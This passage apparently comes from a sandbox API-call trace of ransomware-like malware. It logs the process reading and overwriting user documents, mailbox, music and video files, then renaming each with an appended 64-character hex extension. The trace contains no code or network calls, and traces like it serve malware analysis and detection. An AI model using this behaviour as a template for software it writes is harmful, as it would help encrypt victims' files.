lpOverlapped=0x723f8f0) returned 1 [0166.994] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.996] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv", lpString2=".519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv.519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv.519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C" [0166.996] GetProcessHeap () returned 0x270000 [0166.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741da30 [0166.996] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741da30, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.999] CloseHandle (hObject=0x598) returned 1 [0167.001] GetProcessHeap () returned 0x270000 [0167.002] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.002] RtlInterlockedCompareExchange64 () returned 0x1 [0167.002] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.008] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 
lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.010] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.012] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt", lpString2=".0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt.0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt.0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E" [0167.012] GetProcessHeap () returned 0x270000 [0167.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741db68 [0167.012] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741db68, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.014] CloseHandle (hObject=0x598) returned 1 [0167.015] GetProcessHeap () returned 0x270000 [0167.016] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.016] RtlInterlockedCompareExchange64 () returned 0x1 [0167.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.020] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.021] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.023] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.024] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc", lpString2=".FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc.FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc.FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973" [0167.024] GetProcessHeap () returned 0x270000 [0167.024] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f91c0 [0167.024] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42f91c0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0167.026] CloseHandle (hObject=0x598) returned 1 [0167.027] GetProcessHeap () returned 0x270000 [0167.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.028] RtlInterlockedCompareExchange64 () returned 0x1 [0167.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.040] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: 
lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.044] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0167.045] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx", lpString2=".794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx.794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx.794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38" [0167.045] GetProcessHeap () returned 0x270000 [0167.045] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x42f92e8 [0167.045] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f92e8, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0167.047] CloseHandle (hObject=0x5ac) returned 1 [0167.048] GetProcessHeap () returned 0x270000 [0167.050] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.050] RtlInterlockedCompareExchange64 () returned 0x1 [0167.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.178] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, 
nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.179] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.181] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0167.183] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx", lpString2=".9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx.9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx.9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967" [0167.183] GetProcessHeap () returned 0x270000 [0167.183] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741dca0 [0167.183] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x741dca0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0167.192] CloseHandle (hObject=0x5ac) returned 1 [0167.192] GetProcessHeap () returned 0x270000 [0167.194] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.195] RtlInterlockedCompareExchange64 () returned 0x1 [0167.195] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, 
lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.200] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.201] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.202] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.204] RtlInterlockedCompareExchange64 () returned 0x0 [0167.204] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.205] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.206] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst", lpString2=".476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst.476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst.476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739" [0167.206] GetProcessHeap () returned 0x270000 [0167.206] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb750 [0167.207] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fb750, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0167.211] CloseHandle (hObject=0x598) returned 1 [0167.214] GetProcessHeap () returned 0x270000 [0167.216] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.217] RtlInterlockedCompareExchange64 () returned 0x1 [0167.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.226] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.227] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.228] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.230] RtlInterlockedCompareExchange64 () returned 0x0 [0167.230] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.241] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.243] RtlInterlockedCompareExchange64 () returned 0x0 [0167.243] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.255] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.257] RtlInterlockedCompareExchange64 () returned 0x0 [0167.257] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.269] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.271] RtlInterlockedCompareExchange64 () returned 0x0 [0167.271] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.283] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.285] RtlInterlockedCompareExchange64 () returned 0x0 [0167.285] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.297] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.298] RtlInterlockedCompareExchange64 () returned 0x0 [0167.298] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.313] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.319] RtlInterlockedCompareExchange64 () returned 0x0 [0167.319] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.852] ReadFile (in: hFile=0x5b0, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0167.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.853] WriteFile (in: hFile=0x5b8, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0167.855] RtlInterlockedCompareExchange64 () returned 0x0 [0167.855] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0168.411] ReadFile (in: hFile=0x5b8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0168.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0168.426] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0168.427] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3", lpString2=".C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3.C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3.C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931" [0168.427] GetProcessHeap () returned 0x270000 [0168.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4334088 [0168.427] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x4334088, Length=0x120, 
FileInformationClass=0xa) returned 0x0 [0168.429] CloseHandle (hObject=0x5b8) returned 1 [0168.430] GetProcessHeap () returned 0x270000 [0168.432] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0168.432] RtlInterlockedCompareExchange64 () returned 0x0 [0168.432] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.293] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0169.294] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.318] WriteFile (in: hFile=0x5b8, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0169.319] RtlInterlockedCompareExchange64 () returned 0x0 [0169.319] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.327] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75aa0b8, ReturnLength=0x723f8ec) returned 0x0 [0169.328] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv", lpString2=".7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv.7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv.7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36" [0169.328] GetProcessHeap () returned 0x270000 [0169.328] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4334528 [0169.328] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x723f8dc, FileInformation=0x4334528, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.329] CloseHandle (hObject=0x5a4) returned 1 [0169.330] GetProcessHeap () returned 0x270000 [0169.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0169.333] RtlInterlockedCompareExchange64 () returned 0x1 [0169.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.334] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0169.336] RtlInterlockedCompareExchange64 () returned 0x0 [0169.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0170.913] ReadFile (in: hFile=0x5cc, lpBuffer=0x7909298, nNumberOfBytesToRead=0x400, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160) returned 1 [0170.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0170.925] WriteFile (in: hFile=0x590, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0170.927] RtlInterlockedCompareExchange64 () returned 0x0 [0170.927] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.647] ReadFile (in: hFile=0x590, lpBuffer=0x78e1140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008) returned 1 [0171.647] 